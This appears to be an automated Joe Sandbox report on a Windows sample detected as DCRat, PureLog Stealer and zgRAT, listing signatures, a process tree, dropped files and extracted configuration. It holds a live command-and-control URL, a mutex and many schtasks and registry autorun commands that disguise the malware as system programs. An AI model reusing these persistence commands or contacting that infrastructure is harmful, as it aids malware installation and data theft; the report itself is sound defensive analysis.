Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
544WP3NHaP.exe

Overview

General Information

Sample name:544WP3NHaP.exe
renamed because original name is a hash value
Original sample name:50abe040b81818bf7ece156a10dbbbc9.exe
Analysis ID:1583089
MD5:50abe040b81818bf7ece156a10dbbbc9
SHA1:6abd8cfaaeea27ea9b2c7e5a6e05e9f4357c6050
SHA256:730cba8b2d68de1062f9ccaa22e62b4cdb71f08283d1d5fd985941e7e3087921
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 544WP3NHaP.exe (PID: 7076 cmdline: "C:\Users\user\Desktop\544WP3NHaP.exe" MD5: 50ABE040B81818BF7ECE156A10DBBBC9)
    • wscript.exe (PID: 6360 cmdline: "C:\Windows\System32\WScript.exe" "C:\bridgemssurrogateintonet\QHbd8WvF.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 6196 cmdline: C:\Windows\system32\cmd.exe /c ""C:\bridgemssurrogateintonet\7tLztOWB7CeM.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • bridgeportDhcpcommon.exe (PID: 6288 cmdline: "C:\bridgemssurrogateintonet/bridgeportDhcpcommon.exe" MD5: F9C0873D0CBC71DB9729CDF3B976A5AD)
          • schtasks.exe (PID: 180 cmdline: schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Recovery\SearchApp.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5840 cmdline: schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Recovery\SearchApp.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6940 cmdline: schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 12 /tr "'C:\Recovery\SearchApp.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • csc.exe (PID: 4340 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 3084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 4600 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES26F0.tmp" "c:\Windows\System32\CSCFCD79A4B9D0A479191609B82C626EB1.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • schtasks.exe (PID: 5236 cmdline: schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2536 cmdline: schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1028 cmdline: schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3612 cmdline: schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1272 cmdline: schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6388 cmdline: schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1196 cmdline: schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 12 /tr "'C:\bridgemssurrogateintonet\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 984 cmdline: schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ" /sc ONLOGON /tr "'C:\bridgemssurrogateintonet\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5012 cmdline: schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 13 /tr "'C:\bridgemssurrogateintonet\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4296 cmdline: schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 12 /tr "'C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4584 cmdline: schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ" /sc ONLOGON /tr "'C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6868 cmdline: schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 8 /tr "'C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1368 cmdline: schtasks.exe /create /tn "bridgeportDhcpcommonb" /sc MINUTE /mo 8 /tr "'C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6748 cmdline: schtasks.exe /create /tn "bridgeportDhcpcommon" /sc ONLOGON /tr "'C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6360 cmdline: schtasks.exe /create /tn "bridgeportDhcpcommonb" /sc MINUTE /mo 12 /tr "'C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 6500 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xNnAMDzXoE.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 3052 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 4296 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
  • iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe (PID: 6172 cmdline: "C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe" MD5: F9C0873D0CBC71DB9729CDF3B976A5AD)
  • iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe (PID: 180 cmdline: "C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe" MD5: F9C0873D0CBC71DB9729CDF3B976A5AD)
  • bridgeportDhcpcommon.exe (PID: 5664 cmdline: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe MD5: F9C0873D0CBC71DB9729CDF3B976A5AD)
  • bridgeportDhcpcommon.exe (PID: 5576 cmdline: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe MD5: F9C0873D0CBC71DB9729CDF3B976A5AD)
  • bridgeportDhcpcommon.exe (PID: 2536 cmdline: "C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe" MD5: F9C0873D0CBC71DB9729CDF3B976A5AD)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://126987cm.renyash.ru/VmpipeJavascript_HttpauthLongpollMultiWordpressDle", "MUTEX": "DCR_MUTEX-ifozT5IhpWQVKWPrvZtc", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
544WP3NHaP.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    544WP3NHaP.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 7 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000005.00000000.1870378712.0000000000A12000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000015.00000002.2906400363.0000000002C86000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    00000000.00000003.1651965789.00000000062AB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      00000000.00000003.1652451917.0000000006BBB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        00000015.00000002.2906400363.0000000002606000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          Click to see the 4 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          5.0.bridgeportDhcpcommon.exe.a10000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            5.0.bridgeportDhcpcommon.exe.a10000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              0.3.544WP3NHaP.exe.62f96e5.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                0.3.544WP3NHaP.exe.62f96e5.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                  0.3.544WP3NHaP.exe.6c096e5.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                    Click to see the 5 entries

                                    Sigma Signatures

                                    System Summary

                                    barindex
                                    Sigma detected: Files With System Process Name In Unsuspected Locations
                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 4340, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe
                                    Sigma detected: CurrentVersion Autorun Keys Modification
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Recovery\SearchApp.exe", EventID: 13, EventType: SetValue, Image: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe, ProcessId: 6288, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp
                                    Sigma detected: CurrentVersion NT Autorun Keys Modification
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Recovery\SearchApp.exe", EventID: 13, EventType: SetValue, Image: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe, ProcessId: 6288, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\bridgemssurrogateintonet/bridgeportDhcpcommon.exe", ParentImage: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe, ParentProcessId: 6288, ParentProcessName: bridgeportDhcpcommon.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.cmdline", ProcessId: 4340, ProcessName: csc.exe
                                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\bridgemssurrogateintonet\QHbd8WvF.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\bridgemssurrogateintonet\QHbd8WvF.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\544WP3NHaP.exe", ParentImage: C:\Users\user\Desktop\544WP3NHaP.exe, ParentProcessId: 7076, ParentProcessName: 544WP3NHaP.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\bridgemssurrogateintonet\QHbd8WvF.vbe" , ProcessId: 6360, ProcessName: wscript.exe
                                    Sigma detected: Dynamic CSharp Compile Artefact
                                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe, ProcessId: 6288, TargetFilename: C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.cmdline

                                    Data Obfuscation

                                    barindex
                                    Sigma detected: Dot net compiler compiles file from suspicious location
                                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\bridgemssurrogateintonet/bridgeportDhcpcommon.exe", ParentImage: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe, ParentProcessId: 6288, ParentProcessName: bridgeportDhcpcommon.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.cmdline", ProcessId: 4340, ProcessName: csc.exe

                                    Suricata Signatures

                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-01-01T21:47:26.530224+010020480951A Network Trojan was detected192.168.2.449736172.67.220.19880TCP

                                    Joe Sandbox Signatures

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Antivirus / Scanner detection for submitted sample
                                    Source: 544WP3NHaP.exeAvira: detected
                                    Antivirus detection for URL or domain
                                    Source: http://126987cm.renyash.ru/Avira URL Cloud: Label: malware
                                    Source: http://126987cm.renyash.ru/VmpipeJavascript_HttpauthLongpollMultiWordpressDle.phpAvira URL Cloud: Label: malware
                                    Source: http://126987cm.renyash.ruAvira URL Cloud: Label: malware
                                    Antivirus detection for dropped file
                                    Source: C:\Recovery\SearchApp.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\bridgemssurrogateintonet\QHbd8WvF.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\LsbmIiGn.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Users\user\Desktop\KSdeeKAW.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\AjJOuhvp.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\BJIWYGBF.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\AppData\Local\Temp\xNnAMDzXoE.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Found malware configuration
                                    Source: 00000005.00000002.1924266865.000000001306B000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://126987cm.renyash.ru/VmpipeJavascript_HttpauthLongpollMultiWordpressDle", "MUTEX": "DCR_MUTEX-ifozT5IhpWQVKWPrvZtc", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                                    Multi AV Scanner detection for dropped file
                                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeReversingLabs: Detection: 73%
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeReversingLabs: Detection: 73%
                                    Source: C:\Recovery\SearchApp.exeReversingLabs: Detection: 73%
                                    Source: C:\Users\user\Desktop\AjJOuhvp.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\BJIWYGBF.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\KSdeeKAW.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\LsbmIiGn.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\mEBzyVHW.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\qeNySdhc.logReversingLabs: Detection: 25%
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeReversingLabs: Detection: 73%
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeReversingLabs: Detection: 73%
                                    Source: C:\bridgemssurrogateintonet\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeReversingLabs: Detection: 73%
                                    Multi AV Scanner detection for submitted file
                                    Source: 544WP3NHaP.exeVirustotal: Detection: 55%Perma Link
                                    Source: 544WP3NHaP.exeReversingLabs: Detection: 65%
                                    AI detected suspicious sample
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                                    Machine Learning detection for dropped file
                                    Source: C:\Recovery\SearchApp.exeJoe Sandbox ML: detected
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\LsbmIiGn.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\KSdeeKAW.logJoe Sandbox ML: detected
                                    Source: C:\Windows\System32\SecurityHealthSystray.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\atZTrSKs.logJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\sgzhoMlY.logJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeJoe Sandbox ML: detected
                                    Machine Learning detection for sample
                                    Source: 544WP3NHaP.exeJoe Sandbox ML: detected
                                    Sample uses string decryption to hide its real strings
                                    Source: 00000005.00000002.1924266865.000000001306B000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-ifozT5IhpWQVKWPrvZtc","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                                    Source: 00000005.00000002.1924266865.000000001306B000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://126987cm.renyash.ru/","VmpipeJavascript_HttpauthLongpollMultiWordpressDle"]]
                                    Source: 544WP3NHaP.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeDirectory created: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeDirectory created: C:\Program Files\Windows Portable Devices\8e809f57164876Jump to behavior
                                    Source: 544WP3NHaP.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 544WP3NHaP.exe
                                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.pdb source: bridgeportDhcpcommon.exe, 00000005.00000002.1918124129.0000000003C2C000.00000004.00000800.00020000.00000000.sdmp

                                    Spreading

                                    barindex
                                    Infects executable files (exe, dll, sys, html)
